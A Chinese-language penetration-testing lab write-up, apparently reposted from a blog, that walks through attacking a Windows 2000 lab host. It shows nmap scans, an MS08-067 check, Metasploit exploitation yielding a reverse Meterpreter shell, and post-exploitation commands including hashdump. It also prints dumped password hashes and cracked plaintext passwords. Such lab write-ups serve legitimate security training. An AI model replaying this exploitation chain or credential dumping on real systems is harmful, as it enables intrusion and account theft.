Nmap 渗透实列

0x00 前言

渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限。在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到实战之中。今天笔者将继续来分析渗透测试学习笔记系列的第二个案例。


0x01 案例分析

实验环境:

  • 目标靶机:10.11.1.0/24

  • 攻击机:Kali Linux (10.11.0.38)

渗透过程:

首先,一如既往的利用nmap来进行端口探测,比如我简单地探测了IP:10.11.1.227 如下:

# nmap -sV -O -Pn 10.11.1.227

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-11 07:08 CST
Stats: 0:04:03 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.227
Host is up (0.28s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc        Microsoft Distributed Transaction Coordinator
5800/tcp open  vnc-http     RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5900)
5900/tcp open  vnc          VNC (protocol 3.8)
MAC Address: 00:50:56:89:71:CB (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.50%E=4%D=8/11%OT=135%CT=1%CU=42087%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=598CE880%P=i686-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=I%TS=0)SEQ(S
OS:P=101%GCD=1%ISR=106%TI=I%II=I%SS=S%TS=0)OPS(O1=M529NW0NNT00NNS%O2=M529NW
OS:0NNT00NNS%O3=M529NW0NNT00%O4=M529NW0NNT00NNS%O5=M529NW0NNT00NNS%O6=M529N
OS:NT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y
OS:%T=80%W=FAF0%O=M529NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
OS:)IE(R=Y%DFI=S%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OSs: Windows, Windows 2000; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_2000

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 245.29 seconds

分析上面的扫描结果后,我们得到如下信息:

  1. 目标主机开启了139,445端口且banner显示为Microsoft Windows 2000 microsoft-ds
  2. 目标主机开启了Windows RPC服务,端口为1025和1026
  3. 目标主机开启了RealVNC服务,端口为5800和5900
  4. 目标主机很可能是Windows 2000服务器

整理完了这些信息之后,接下来我们需要思考突破点了,一个常见的思路是针对开启的服务寻找可能的利用方法。

  1. 对于139和445端口,我们首先需要考虑的就是smb漏洞,比如:ms17-010,ms08-067等等
  2. 对于Windows RPC和VNC服务,我们不妨看看有没有现成的exploit可以使用
  3. 对于Windows 2000服务器,足够老的服务器早已不再有补丁支持,是否可以被利用

诚如我之前所说,渗透测试要善于利用已知漏洞,可以利用搜索引擎检索,也可以利用一些漏洞利用数据库去查询(如:exploit-db, securityfocus等),还可以直接借助已有的渗透测试工具(如:nmap的NSE脚本,Metasploit的exploit模块,自己平时搜集的漏洞利用,等等)。

继续回到我们的目标主机(10.11.1.227),由于存在smb服务且目标主机很可能为Windows 2000服务器,一个简单的猜想便是是否存在ms08-067漏洞。为了验证我们的猜想,先用nmap扫描一下:

# nmap --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse -sT -Pn 10.11.1.227

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-11 08:59 CST
Nmap scan report for 10.11.1.227
Host is up (0.26s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1029/tcp open  ms-lsa
3372/tcp open  msdtc
5800/tcp open  vnc-http
5900/tcp open  vnc

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

从扫描结果可知,目标主机似乎是存在ms08-067漏洞的。既然如此,我们就来测试一下。考虑到msf已经有ms08-067的利用模块了,因此我们可以直接来尝试利用一下。

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.11.1.227
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.11.0.38:4444
[*] 10.11.1.227:445 - Automatically detecting the target...
[*] 10.11.1.227:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] 10.11.1.227:445 - Selected Target: Windows 2000 Universal
[*] 10.11.1.227:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 10.11.1.227
[*] Meterpreter session 2 opened (10.11.0.38:4444 -> 10.11.1.227:1256) at 2017-08-11 08:39:12 +0800

meterpreter > 

果然,目标主机存在ms08-067漏洞,并且我们成功地获得了一个meterpreter会话。一旦有了meterpreter会话,我们需要考虑以下几个问题:

当前运行的账户权限是不是SYSTEM且是否需要提权
目标机器的系统信息是什么
目标机器是否存在反病毒程序影响我们的后渗透操作
目标机器上有哪些用户和组且是否存在域用户(如:域管理员账户)
目标机器上是否可以dump hash(可用来破解密码或者Pass The Hash攻击)
等等

如下一些常见的meterpreter和shell命令可以帮我们轻松地确认以上的问题:

getuid – 获取当前运行用户

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

getsystem – 利用内置的payload帮助提权

meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

sysinfo – 获取操作系统信息

meterpreter > sysinfo
Computer        : JD
OS              : Windows 2000 (Build 2195).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows

ps – 获取当前系统上正在运行的所有进程

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]  x86
 8     0     System            x86   0        NT AUTHORITY\SYSTEM
 172   8     smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 196   172   csrss.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINNT\system32\csrss.exe
 216   172   WINLOGON.EXE      x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINNT\system32\winlogon.exe

hashdump – 获取系统上所有用户的LM Hash或者NTLM Hash

meterpreter > hashdump
admin:1007:a46139feaaf2b9f117306d272a9441bb:c5e0002fde3f5eb2cf5730ffee58ebcc:::
Administrator:500:7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af:::
backup:1006:16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0:::
david:1009:43af16fff22f1628aad3b435b51404ee:1fbff38cae51e9918da1fec572f03e11:::
gary:1013:998d9dc042886317c72befe227197ae1:ba359fa9d25791c2180e424bb7bb0753:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
homer:1017:ef91a6d3cf901b8baad3b435b51404ee:b184d292a82b6ad35c3cfca81f1f59bc:::
IUSR_SRV2:1020:f7d96ebcbe5b6be3103ccb00190f6271:09ff503707453d56bb69f40bef542da0:::
IWAM_SRV2:1019:96fe1fc02d73a84c463db170b09126f1:be6ec26d0d71a533e14b65ce755d7bce:::
john:1010:e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::
lee:1015:b096847ead9b7476aad3b435b51404ee:208adb08381adab3032eedbd35399642:::
lisa:1011:a179639dcaf4e1c4aad3b435b51404ee:8acf28fdc0168e003fb3e05bcb463d1b:::
mark:1012:6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364:::
ned:1016:836eda0fbc609e6393e28745b8bf4ba6:4f16328129408ed105dec3a938c266eb:::
nick:1014:59b8b93a9a6477e4aad3b435b51404ee:ee28ad35a22c752c1a75be3f9a7e82c9:::
simon:1008:598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf:::
sqlusr:1005:6307ab24156c541aaad3b435b51404ee:6a370590bd44ac8e65d045254a170ab7:::
todd:1018:9e00b755e79c8cf95533b366e9511e4b:4150133921fe34dd2e777b1ca0361410:::
TsInternetUser:1000:e52cac67419a9a22f96f275e1115b16f:e22e04519aa757d12f1219c4f31252f4:::
shell – 开启一个cmd shell以便获取更过系统信息或者执行payload

meterpreter > shell
Process 760 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
admin                    Administrator            backup
david                    gary                     Guest
homer                    IUSR_SRV2                IWAM_SRV2
john                     lee                      lisa
mark                     ned                      nick
simon                    sqlusr                   todd
TsInternetUser
The command completed with one or more errors.

C:\WINNT\system32>net view /domain
net view /domain
Domain

-------------------------------------------------------------------------------
MYGROUP
THINC
WORKGROUP
The command completed successfully.

C:\WINNT\system32>ipconfig -all
ipconfig -all

Windows 2000 IP Configuration

    Host Name . . . . . . . . . . . . : jd
    Primary DNS Suffix  . . . . . . . : acme.local
    Node Type . . . . . . . . . . . . : Mixed
    IP Routing Enabled. . . . . . . . : No
    WINS Proxy Enabled. . . . . . . . : No
    DNS Suffix Search List. . . . . . : acme.local

Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix  . :
    Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
    Physical Address. . . . . . . . . : 00-50-56-89-5E-EC
    DHCP Enabled. . . . . . . . . . . : No
    IP Address. . . . . . . . . . . . : 10.11.1.227
    Subnet Mask . . . . . . . . . . . : 255.255.0.0
    Default Gateway . . . . . . . . . : 10.11.1.220
    DNS Servers . . . . . . . . . . . : 10.11.1.220
                                        10.11.1.221

C:\WINNT\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
backup
The command completed successfully.

C:\WINNT\system32>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\BETHANY
\\BOB2
\\CORY
\\GAMMA
\\MAIL                 thincmail
\\MIKE                 mike
\\SHERLOCK
The command completed successfully.

后渗透过程中的一个重要步骤就是Dump Hash,有了密码hash我们就可以来尝试破解密码以及Pass The Hash攻击了。通过上面的一系列信息获取,我们已经知道了目标系统是Windows 2000并了解到这些Hash都是易破解的LM Hash, 因此我们可以尝试去破解这些Hash来获取明文的密码,破解结果如下:

user: backup
Hash: 16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0
Password: backup

user: Administrator
Hash: 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af
Password: 7A6417Yrjh

user: admin
Hash: a46139feaaf2b9f117306d272a9441bb:c5e0002fde3f5eb2cf5730ffee58ebcc
Password: CHANGEME

User: david
Hash: 43af16fff22f1628aad3b435b51404ee:1fbff38cae51e9918da1fec572f03e11:::
Password: 012345

User: gary
Hash: 998d9dc042886317c72befe227197ae1:ba359fa9d25791c2180e424bb7bb0753:::
Password: REDGREENBLUE

User: john Hash: e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef::: Password: password1

注:http://www.objectif-securite.ch/en/ophcrack.php 一个在线的LMHash破解网站

至此,我们已经完全控制了目标机器并获取到了一些用户的明文密码以便为后期的持续渗透做准备。

0x02 小结

总结一下本案例中的渗透测试方法和思路:

nmap扫描目标主机常见端口
分析和整理可能存在漏洞的服务
搜索和验证存在漏洞的服务
利用服务漏洞获取系统shell
判断是否需要提权操作
获取密码hash并破解用户明文密码
整理明文密码表为持续渗透做准备

本文转自:安全小飞侠的窝【http://avfisher.win/archives/756】

你可能感兴趣的:(安全,渗透测试)